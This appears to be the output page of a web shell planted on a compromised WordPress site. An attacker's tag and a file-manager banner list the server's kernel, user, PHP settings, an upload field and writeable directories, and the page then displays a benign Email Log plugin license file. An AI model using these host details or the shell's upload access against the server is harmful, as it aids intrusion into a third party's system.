Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/store/wp-content/plugins/email-log/include/Addon/License/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/store/wp-content/plugins/email-log/include/Addon/License/AddonLicense.php
<?php namespace EmailLog\Addon\License;

defined( 'ABSPATH' ) || exit; // Exit if accessed directly.

/**
 * EmailLog License.
 *
 * @since 2.0.0
 */
class AddonLicense extends BaseLicense {

	/**
	 * Get License key.
	 *
	 * @return string|null License key.
	 */
	public function get_license_key() {
		if ( empty( $this->license_data ) ) {
			return parent::get_license_key();
		}

		return $this->license_data->license_key;
	}

	/**
	 * Option name in which individual license data is stored.
	 * This method should be called only after setting the add-on name.
	 *
	 * @return string Option name.
	 */
	protected function get_option_name() {
		return 'el_license_' . md5( $this->get_addon_name() );
	}
}

Hry